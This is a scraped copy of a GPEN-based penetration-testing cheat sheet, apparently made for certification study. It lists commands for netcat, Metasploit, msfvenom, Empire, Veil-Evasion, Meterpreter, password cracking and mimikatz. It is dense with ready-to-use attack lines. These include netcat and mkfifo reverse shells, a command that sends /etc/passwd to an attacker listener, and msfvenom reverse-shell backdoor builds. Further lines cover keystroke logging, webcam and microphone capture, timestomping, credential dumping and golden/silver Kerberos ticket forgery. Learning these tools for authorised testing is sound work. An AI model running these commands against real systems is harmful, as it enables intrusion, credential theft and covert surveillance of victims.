0% found this document useful (0 votes)
302 views

Pentest Command Tools Gpen Based Cheat Sheet

This document provides a summary of pentesting command line tools including netcat, tcpdump, dig, traceroute, and metasploit. It lists common flags and syntax for performing tasks like port scanning, banner grabbing, file transfer, process monitoring, and setting up reverse shells. The cheat sheet serves as a quick reference guide for penetration testers to perform reconnaissance and post-exploitation activities.

Uploaded by

lbb1987
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
302 views

Pentest Command Tools Gpen Based Cheat Sheet

This document provides a summary of pentesting command line tools including netcat, tcpdump, dig, traceroute, and metasploit. It lists common flags and syntax for performing tasks like port scanning, banner grabbing, file transfer, process monitoring, and setting up reverse shells. The cheat sheet serves as a quick reference guide for penetration testers to perform reconnaissance and post-exploitation activities.

Uploaded by

lbb1987
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Pentest command Tools (GPEN Based) Cheat Sheet

by Hey Mensh (HeyMensh) via cheatography.com/150100/cs/32550/

General Reconn DNS Query (cont)

fping -g Ping sweep ls -d [targe​t__​domain] [> Store zone transfer


x.x.x.0 filename] output in a file
x.x.x.254 -a view [filename] view file
Linux traceroute Options dig
-4 Forces IPv4 dig @[name server] [domain dig comand syntax
-6 Forces IPv6, same as tracer​oute6 command name] [record type]

-I Uses ICMP echo dig +nocom​ments @192.1​‐ test if allows anonymous

-T Uses TCP SYN 68.1.50 lab.local -t AXFR zone transfers

-f <fi​rst​‐ Starts from the hop specified instead of 1 set norecurse no recursive query,

_tt​l> RD=0

-g <ga​tew​ay> Routes packets through the gateway specified


Netcat
instead of the default
Flags
-m <ma​x_t​‐ Specifies the maximum number of hops;
tls> default is 30 -l Listen mode (default is client)

-n Specifies not to resolve IP address to -L Listen harder (Windows only) — Make a persistent

hostnames listener

-w <wa​it> Specifies the wait time, which can be in -u UDP mode (defaultis TCP)

seconds or relative to the reply time between -p Local port (In listen mode, this is port listened connec​tions
hops on. In client mode, this is source port for packets sent.)
-p <po​rt> Specifies the port -e Program to execute after connection occurs
<fi​‐
DNS Query len​‐

nslookup ame>

nslookup -norecurse - DNS Snooping | nonrec​ursive -n Don’t resolve names


type=A google.com DNS_SR​‐ query -z Zero—I/O mode: Don’t send any data, just emit packets
VR_IP -w[N] Timeout for connects, waits for N seconds
server [serve​rIPaddr or use specific server -v Be verbose, printing when a connec​tionis made
name]

set type=any set DNS record type

ls -d [targe​t_d​omain] Perform a zone transfer of all


records for a given domain

By Hey Mensh (HeyMensh) Published 23rd November, 2022. Sponsored by CrosswordCheats.com


cheatography.com/heymensh/ Last updated 23rd November, 2022. Learn to solve cryptic crosswords!
Page 1 of 10. http://crosswordcheats.com
Pentest command Tools (GPEN Based) Cheat Sheet
by Hey Mensh (HeyMensh) via cheatography.com/150100/cs/32550/

Netcat (cont) Netcat (cont)

nc -e executes a command while (true); do no -vv -z -w3 [targe​‐ Servic​e-


upon connection b_IP] [targe​t_port] > /dev/null && echo i​s-alive
-vv Be verbose, printing -e "​\x0​7"; sleep 1; done heartbeat
when connec​tions are while `nc —vv -z —w3 [targe​t_IP] Servic​e-
made, dropped, and so [targe​t_port] > /dev/null` ;do echo "​‐ l​s-Dead
on Service is ok"; sleep 1; done; echo "​‐ Notifi​‐
General Service is dead"; echo —e "​\x0​7" cation

nc -lvnp XX Server listen, verbos​‐ altern​ative


ity​,no​DNS,on port XX
nc -n -v -l -p 2222 < /tmp/w​ina​uth.pcap Setup
SHELLS listener
nc IP PORT -e /bin/bash Client reverse shell that will
send the
rm -f /tmp/f ; mkfifo /tmp/f ; netcat -e altern​ative
file
cat /tmp/f​|/b​in/sh -i example
2>&1|nc $RHOST $RPORT >/tmp/f nc.exe -n -v -w3 [YourL​inu​xIP​addr] Client to
2222 >C:​\fo​lde​r\w​ina​uth.pcap capture
On target:
and save
mknod backpipe p the file
nc --1 -p [allow​ed_​inb​oun​d_port] 0<b​ackpipe |
nc 127.0.0.1 22 1>b​ackpipe TCPDUMP | Monitoring

Attackers machine to connect: General


ssh login_​nam​e@[​tar​get​mac​hine] -p [allow​‐ tcpdump -nnv -i start capturing traffic
ed_​inb​oun​d_port] eth0

A really good explan​ation for this is on 560.3 book, P 152 -n Use numbers instead of names for machines
Send Files -nn Use numbers for machines and ports
nc -l -p 8080 > filename setup listener and output -i Sniff on a particular interface (—D lists interf​‐
file aces)
nc -w 3 attackerIP 8080 < sends file to netcat -v Be verbose
/etc/p​asswd listener with 3 secs
-w Dump packets to a file (use —r to read file
timeout
later)
Scan ports
-x Print hex
nc -v -n IP port test 1 port
-X Print hex and ASCII
nc -v -w 2 -z IP_Address port range
-A Print ASCII
port_range
s [snaplen] Sniff this many bytes from each frame,
echo "​" | nc -v -n —w1 a port scanner that
instead of the defaul
[targetIP] [port—​range] harvests banners

Other Uses

By Hey Mensh (HeyMensh) Published 23rd November, 2022. Sponsored by CrosswordCheats.com


cheatography.com/heymensh/ Last updated 23rd November, 2022. Learn to solve cryptic crosswords!
Page 2 of 10. http://crosswordcheats.com
Pentest command Tools (GPEN Based) Cheat Sheet
by Hey Mensh (HeyMensh) via cheatography.com/150100/cs/32550/

TCPDUMP | Monitoring (cont) Metasploit (cont)

Protocol: set lport 443


ether, ip, ip6 , arp, rarp, tcp, udp: protocol type exploit -j -z Run in ackground
Type: PS Session with valid creds
host [host] Only give me packets to or from that use auxili​ary​/ad​min​/sm​b/p​sex​ec_​command
host
set smbuser user
net [network] Only packets for a given network
set rhost victimIP
port [portnum] Only packets for that port
set smbpass P4$$
portrange [start​— Only packets in that range of ports
set command "​ipc​onfig or any comman​d"
end]
run
Direction:
Create backdoor - recognized by Defender :(
src Only give me packets from that host or
msfvenom -p window​s/s​hel​l/r​eve​rse_tcp LHOST=
port
[Attac​kerIP] LPORT=8080 -f exe > /tmp/f​ile.exe
dst Only give me packets to that host
msfvenom -p window​s/x​64/​met​erp​ret​er_​rev​‐
Use and / or to combine these together
ers​e_https LHOST=​Att​ackerIP LPORT=443 -f exe -o
Wrap in parent​heses to group elements together pwned.exe

Others
Hashcat
sessions -l get a list of sessions
hashcat -m 1800 -a 0 -o crack Linux SHA512
password with dict sessions -i [N] interact (-i) with session
found1.txt crack1.hash 500_pa​‐
number [N]
ssw​ord​s.txt
press CTRL-Z Background session
hashcat --force -m 13100 -a 0 Crack Kerberos
lab3.h​ashcat /path/​to/​Dic​‐ Service Ticket for jobs get background jobs

t.txt --show account password db_import /path/​to/​fil​‐ Import scans from nmap
e/n​map.xml
PowerS​plo​it/​Pow​erView hosts -m "​Windows 10" Add comment to host
Invoke​- Requests service tickets for kerber​oas​t-able 192.16​8.1.10
Ke​rbe​‐ accounts and returns extracted ticket hashes services -u -p 135,445 Show UP hosts with Lports
roast 135,445
sessions -h list help for sessions
Metasploit
command
Create Handler listener sessions -K kill a session
use exploi​t/m​ult​i/h​andler

set payload window​s/x​64/​met​erp​ret​er/​rev​‐


ers​e_https OR window​s/m​ete​rpr​ete​r/r​eve​‐
rse_tcp

set lhost AttackerIP

By Hey Mensh (HeyMensh) Published 23rd November, 2022. Sponsored by CrosswordCheats.com


cheatography.com/heymensh/ Last updated 23rd November, 2022. Learn to solve cryptic crosswords!
Page 3 of 10. http://crosswordcheats.com
Pentest command Tools (GPEN Based) Cheat Sheet
by Hey Mensh (HeyMensh) via cheatography.com/150100/cs/32550/

Empire Empire (cont)

set up an Empire HTTP listener set StagingKey configure a custom staging key for
usestager window​s/l​aun​che​r_bat [Some_​Sec​ret​_Value] encrypting commun​ica​tions

set Listener http set Defaul​tDelay 1 time between callbacks from our agent
execute launch listener
execute
list check out our listene
General
deploy an agent
list agents
usestager create and deploy an agent | [space​][T​AB-
interact AGENTID chose an agent
TAB] To see available stagers
download C:\Use​rs​‐ transfer file from agentPC
usestager 1aunch​‐ select stager
\ali​ce​\Des​kto​p\s​‐
er_bat
ome.txt
info get info for actual stager
Timest​omping
upload /tmp upload content from /tmp to MSFDB - Metasploit Database
actual session directory
Most useful database commands
usemodule manage​men​‐ load timestomp module
db_connect Connects to a database
t/t​ime​stomp
[conne​‐
set ALL 03/02/2020 5:28 define time to be set in all ct_​‐
pm datetime file properties string]
set FilePath bank_l​ogi​‐ set target file to be tampered db_dis​‐ Discon​nects from database
n_i​nfo​rma​tio​n.txt connect
execute run module db_driver Selects the database type
Others db_status Displays the status of the database
/opt/E​mpi​re-​mas​‐ Empire Download's location db_export Exports database contents into a file, either xml
ter​/do​wnl​oads/ (with hosts,​ports, vulner​abi​lities, and more) or
sell powershell Get-Ch​‐ Run powershell command pwdump (with pilfered creden​tials)
ildItem hosts Get list of hosts disvco​vered
General vulns Get list of vulns that were found in scanned hosts
? Get command sugges​tions services Get list of services running in gained hosts
search​module privesc search for modules hosts -- manually add hosts
configure a listener add [host]
listeners getting a list of our listeners
options options we have for our
listeners

By Hey Mensh (HeyMensh) Published 23rd November, 2022. Sponsored by CrosswordCheats.com


cheatography.com/heymensh/ Last updated 23rd November, 2022. Learn to solve cryptic crosswords!
Page 4 of 10. http://crosswordcheats.com
Pentest command Tools (GPEN Based) Cheat Sheet
by Hey Mensh (HeyMensh) via cheatography.com/150100/cs/32550/

MSFDB - Metasploit Database (cont) Veil-E​vasion (cont)

services --add -p manually add services running in clean Clean out any leftover cruft from previous use
[port] -r [proto] -s hosts of Veil-E​vasion,
[name] [hostl​,ho​‐ Generate payload
st2​,...] use info select the payload you want to generate
notes --add -t [type] manually add notes to a host powers​hel​‐
-n '[note​_text]' l/m​ete​rpr​‐
[hostl​,ho​st2​,...] ete​r/r​ev_​‐
If you delete a host, any services and vulns corres​ponding to that https
host_id will also disappear options list options for actual item
db_nmap --sT 10.10.1​‐ invoke Nmap directly from the generate create the payload file
0.10 --pack​et—​trace msfconsole
Generated files
db_import [filename] import data | automa​tically
.bat This is the payload itself
recognizes the file type like Nmap
.rc This is the Metasploit config​uration file (also
xml, Amap, Nexpose, Qualys,
known as a handler file) for a multi/​handler
Nessus
waiting for a connection from our payload.
hosts -S linux searching for any hosts associated
exit exit Veil-E​vasion
with linux, -S works for other items
(vulns) as well /usr/s​har​‐ Veil-E​vasion output directory

hosts -S linux -R set result as RHOTS variable e/v​eil​-ou​‐

value tpu​t/s​ource

vulns -p 445 Look for vulner​abi​lities based on


traceroute
port number
Options
Veil-E​vasion -f [N] Set the initial TI‘L for the first packet
Start Veil-E​vasion -g Specify a loose source route (8 maximum hops)
cd /opt/V​eil​-Ev​asion || /usr/s​har​e/veil [hostlist]

./Veil​-Ev​asion .py -I Use ICMP Echo Request instead of UDP

General -T Use TCP SYN instead of UDP (very useful​!),with

list get a list of all the different payloads default dest port 80

that the tool can generate -m [N] Set the maximum number of hops

info powers​hel​l/m​‐ et more inform​ation about any of the -n Print numbers instead of names
ete​rpr​ete​r/r​ev_​‐ payloads -p [port] port
https
For UDP, set the base destin​ation UDP port and
increment

By Hey Mensh (HeyMensh) Published 23rd November, 2022. Sponsored by CrosswordCheats.com


cheatography.com/heymensh/ Last updated 23rd November, 2022. Learn to solve cryptic crosswords!
Page 5 of 10. http://crosswordcheats.com
Pentest command Tools (GPEN Based) Cheat Sheet
by Hey Mensh (HeyMensh) via cheatography.com/150100/cs/32550/

traceroute (cont) John the Ripper (cont)

For TCP, set the fixed TCP destin​ation port to use, defaulting ./unshadow Use the unshadow script to combine
to port 80 (no increm​enting) passwd​_copy account info from /etc/p​ass​wdwith
-w Wait for N seconds before giving up and writing * (default is shadow​_copy > password inform​ation from /etc/s​hadow
[N] 5) combin​ed.txt

-4 Force use of IPv4 (by default, chooses 4 or 6 based on dest john combined. txt Run John against the combined file
addr) cat ~/.joh​n/j​ohn.pot Look at the Results in john.pot file
-6 Force use of IPv6
pw-ins​pector (Password Inspector)
John the Ripper -i input file
General -o output file
john.pot file cracked password store -m [n] the minimum number of characters to use for a password is
john.rec file stores john's current status n

john --restore picks up Where it left off based on the contents -M [N] Remove all words longer than N characters
of the john.rec file -c how many password criteria a given word must meet to be
john --test Check Speed Of SyStem [count] included in the list.

john hash.txt run john against hash.txt file -l The password must contain at least one lowercase
character.
john --show compare which passwords John has already
[passw​ord​‐ cracked froma given password file against -u The Password must contain at least one uppercase

_file] itsjoh​n.pot file character. (To specify a mixed case requir​ement, configure
—c 2 -l —u.)
Cracking LANMAN Hashes
-n The password must contain at least one number
john /tmp/s​‐ By default, John will focus on the LANMAN
-p he password must contain at least one printable character
am.txt hashes.
that is neither alphabetic nor numeric, whichi​ncludes
Cracking Linux Passwords
!@#$%"&*().
cp /etc/p​‐ copy passwd file to your working directory
-s The password must include characters not included in the
asswd other lists (such as nonpri​ntable ASCII charac​ters)
/tmp/p​ass​‐
wd_copy

cp /etc/s​‐ copy shadow file to your working directory


hadow
/tmp/s​had​‐
ow_copy

By Hey Mensh (HeyMensh) Published 23rd November, 2022. Sponsored by CrosswordCheats.com


cheatography.com/heymensh/ Last updated 23rd November, 2022. Learn to solve cryptic crosswords!
Page 6 of 10. http://crosswordcheats.com
Pentest command Tools (GPEN Based) Cheat Sheet
by Hey Mensh (HeyMensh) via cheatography.com/150100/cs/32550/

Meterp​reter Meterp​reter (cont)

Basic commands *Target process must have the same or lesser


? / help Display a help menu privileges

exit / quit Quit the Meterp​reter *May be a more stable process


*When inside the process, can access any
sysinfo Show name, OS type
files that it has a lock on
shutdown / reboot Self—e​xpl​anatory
Network Commands
reg read or write to the Registry
ipconfig show network config
File System Commands
route Displays routing table, adds/d​eletes routes
cd Navigate directory structure
portfwd add -1 SANS 560.3 Exploi​tation Page 67 for better
lcd Change local direct​ories on attacker
1111 -p 22 -r unders​tanding
machine
Target2
pwd / getwd Show the current working directory
On-target Machine commands
ls List the directory contents, even 4
screenshot -p SC
Windows
[file.jpg]
cat Display a file’s contents
idletime Show how long the user at the console has
download / upload Move a file to or from the machine been idle
mkdir / rmdir Make or remove direct​ories uictl [enabl​‐ Turn on or off user input devices
edit Edit a file using default editor e/d​isable]

Process Commands 560.3 Page 92 [keybo​‐


ard​/mouse]
getpid Returns the process ID that Meterp​reter
is running in Webcam and Mic Commands

getuid Returns the user ID that the Meterp​reter webcam​__list Lists installed webcams
is running with webcam​_snap Snaps a single frame from the webcam as a
ps || ps -S Process list JPEG: -Can specify JPEG image quality from
notepa​d.exe 1 to 100, with a default of 50

kill Terminate a process record_mic Records audio for N seconds (—d N) and
stores in a wav filein the Metasploit .msf4
execute -f cmd.exe Runs a given program channe​lized (-c)
directory by default
-c -H and hide proccess window (-H)
Make sure you get written permission before activating either feature
migrate [desti​‐ Jumps to a given destin​ation process ID:
Keystroke Logger
nat​ion​_pr​oce​‐
ss_ID]

By Hey Mensh (HeyMensh) Published 23rd November, 2022. Sponsored by CrosswordCheats.com


cheatography.com/heymensh/ Last updated 23rd November, 2022. Learn to solve cryptic crosswords!
Page 7 of 10. http://crosswordcheats.com
Pentest command Tools (GPEN Based) Cheat Sheet
by Hey Mensh (HeyMensh) via cheatography.com/150100/cs/32550/

Meterp​reter (cont) Meterp​reter (cont)

keysca​n_start poll every 30 millis​econds for keystrokes run schtas​ksabuse -c "​‐ script that automates Win-sc​‐
entered into the system [co​mma​nd1​][,​com​man​‐ htasks task creation
keysca​n_dump flushes 1 Megabyte of buffer keystrokes d2]..."​ -t [targetIP]
captured to attacker's Meterp​reter Uses Meterp​reter's process
Screen creden​tials (add -u and -p for
keysca​n_stop tells the Meterp​reter to stop gathering all other creden​tials)
keystrokes load kiwi oad the mimikatz Kiwi Meterp​‐
Pivoting Using Metasp​loit’s Route Command reter extension on the target

use [exploit1] machine


creds_all grab creden​tials
set RHOST [victim1]

set PAYLOAD window​s/m​ete​rpr​ete​r/r​eve​rse_tcp


GPG
exploit
gpg -d -o <Ou​tpu​tFi​leN​ame> <En​cry​‐ decrypt a
CTRL-Z background session... will display meterp​‐ pte​dFi​leN​ame> file
reter sid
route add [victi​‐ direct any of its packets for a given target OVER-P​ASS​-TH​E-HASH
m2_​subnet] machine or subnet through that Meterp​‐
1. Peform the AS-REQ (encry​pting timestamp with passw hash) to
[netmask] [Sid] reter session
get an TGT
use [exploit2] 2. Perform TGS-REQ to KDC to get TGS
set RHOST [victim2] 3. Use TGS to impers​onate passw hash owner and use a service
set PAYLOAD [payloadZ]
Golden Ticket ATTACK
exploit
Requir​ements
Do not confuse the Metasploit (msf) route command with the Meterp​‐
reter route command. The latter is used to manage the routing tables • KDC LT key (e.g. KRBTGT NTLM hash)
on a target box that has been compro​mised using the Meterp​reter • Domain admin account name
payload. The msf route command is used to direct all traffic for a
• Domain name
given target subnet from the attacker’s Metasploit machine through a
given Meterp​reter session on a compro​mised victim machine to • SID of domain admin account

another potential Victim. Commands


Additional Modules .\mimikatz kerber​os:​:golden /admin​:AD​MIN​ACC​‐
use [modul​ename] load additional modules OUN​TNAME /domai​n:D​OMA​INFQDN /id:AC​COU​NTRID
/sid:D​OMA​INSID /krbtg​t:K​RBT​GTP​ASS​WOR​DHASH
Others
.\mimikatz kerber​os::ptt create a golden ticket from file
file.txt with PTT

kerber​os::tgt Get current session ticket


details
kerber​os:​:list /export Export ticket to a .kirbi file

kerber​os::ptt file.kirbi Load / pass the ticket

By Hey Mensh (HeyMensh) Published 23rd November, 2022. Sponsored by CrosswordCheats.com


cheatography.com/heymensh/ Last updated 23rd November, 2022. Learn to solve cryptic crosswords!
Page 8 of 10. http://crosswordcheats.com
Pentest command Tools (GPEN Based) Cheat Sheet
by Hey Mensh (HeyMensh) via cheatography.com/150100/cs/32550/

Silver Ticket ATTACK Silver Ticket ATTACK (cont)

Requir​ements misc::cmd ; klist ; use a command to Auth to


• /target target server’s connect to that specific service for local SVC
FQDN. example: Find-I​nte​res​tin​gFile -Path w/creds and
\\File​Ser​ver​1.d​oma​in.c​om​\S$​\sh​‐ TGS | ej:
• /service SPN
ares\ mimikatz
• /rc4 NTLM hash for
the service Trolling
(computer Faking RIDs
account or user 1106 is "​Ana​kin​" /id:1159
account)
1159 is "​Vad​er" /user:​‐
Steps Anakin
whoami get domain/SID Result: User: Anakin | Real Context User: Vader
invoke​-Ke​rbe​roa​st.ps1 get SPN and /group​s:5​12,​513​,51​8,519 lulz
Service user pass /id:9999
hash for cracking /user:yourmom
Mimikatz “privi​leg​e::​debug” get Service
“sekur​lsa​::l​ogo​npa​ssw​ords” password hash Mimikatz
exit w/Mimikatz (if you
Command Reference for tickets attacks
have access to
/domain domain's fqdn
server hosting
Vuln service) /sid SID of the Domain

hashcat "​"​$kr​b5t​gs$​6$a​cct​‐ Get unencr​ypted /user username to impers​onate


$sv​c/H​OST​:po​rt$​XXX​X…X​XX"" service password /admin
dicti.txt hashcat -m 13100 hash.txt w/hashcat (If we
/groups group RIDs the user is a member of (the first is the
dicti.txt didn't get NTLM
(optional) primary group) default: 513,51​2,5​20,​518,519 for the
hash) and hash it
well-known Admini​str​ator’s groups
to NTLM
/ticket provide a path and name for saving the Golden Ticket
Import​-Module DSInte​rnals $pwd = Hash cleartext
(optional) file to for later use or use /ptt to immedi​ately inject the
Conver​To-​Sec​ure​String password to
golden ticket into memory for use.
'P@$$w0rd' -AsPla​inText -Force NTLM
/ptt as an alternate to /ticket – use this to immedi​ately inject
Conver​tTo​-NTHash $pwd
the forged ticket into memory for use.
mimikatz “kerbe​ros​::g​olden Forge TGS to
/admin​:Im​Admin /id:1106 /domai​‐ auth target SVC
n:l​ab.a​ds​ecu​rit​y.org /sid:S​-
1-​5-2​1-XXXXX /targe​t:E​XCH​ANG​‐
E.l​ab.l​ocal /rc4:N​TLMHash
/servi​ce:​Ser​viceSPN /ptt” exit

By Hey Mensh (HeyMensh) Published 23rd November, 2022. Sponsored by CrosswordCheats.com


cheatography.com/heymensh/ Last updated 23rd November, 2022. Learn to solve cryptic crosswords!
Page 9 of 10. http://crosswordcheats.com
Pentest command Tools (GPEN Based) Cheat Sheet
by Hey Mensh (HeyMensh) via cheatography.com/150100/cs/32550/

Mimikatz (cont) Metadata Analysis

/id user RID. Mimikatz default is 500 (the default Admin ./exiftool t/imag​es/​Exi​‐ execute exiftool against
(optional) account RID). fTo​ol.jpg >/r​oot​/ex​if.out the ExifTo​ol.jpg

/start​‐ the start offset when the ticket is available (generally strings —n 8 file.txt shows strings only eight
offset set to –10 or 0 if this option is used). Mimikatz Default characters long
(optional) value is 0.

/endin ticket lifetime. Mimikatz Default value is 10 years Recon-ng comands for whois_pocs

(optional) (~5,26​2,480 minutes). Active Directory default recon-ng


Kerberos policy setting is 10 hours (600 minutes).
market​place install all ; exit
/renewmax maximum ticket lifetime with renewal. Mimikatz
workspaces create demo
(optional) Default value is 10 years (~5,26​2,480 minutes). Active
modules load recon/​dom​ain​s-c​ont​act​s/w​hoi​‐
Directory default Kerberos policy setting is 7 days
(10,080 minutes). s_pocs

options set SOURCE exampl​e.com


Scapy (Packet crafting) run
GPEN AIO Book - Lab 3-4: Scapy Introd​uctory show contacts
scapy (as root) starts library

help(f​unc​tion) Get help for specific function Cron

p = IP()/T​CP(​)/"F​oo" define blank packet crontab -l list job entries

ls(p) show packet info crontab -e edit job entries

p.show() show packet info

summary show packet info

ls(p[Raw]) view just the data

p[IP].s​rc​="ip​add​‐ set src address


res​"

p[IP].d​st​="ip​add​‐ set dst address


res​"

p[TCP].sp​ort​="xx​" set src port

p[TCP].dp​ort​="xx​" set dst port

p=IP/T​CP/DATA packet structure

AIO Book - Page 158

By Hey Mensh (HeyMensh) Published 23rd November, 2022. Sponsored by CrosswordCheats.com


cheatography.com/heymensh/ Last updated 23rd November, 2022. Learn to solve cryptic crosswords!
Page 10 of 10. http://crosswordcheats.com

You might also like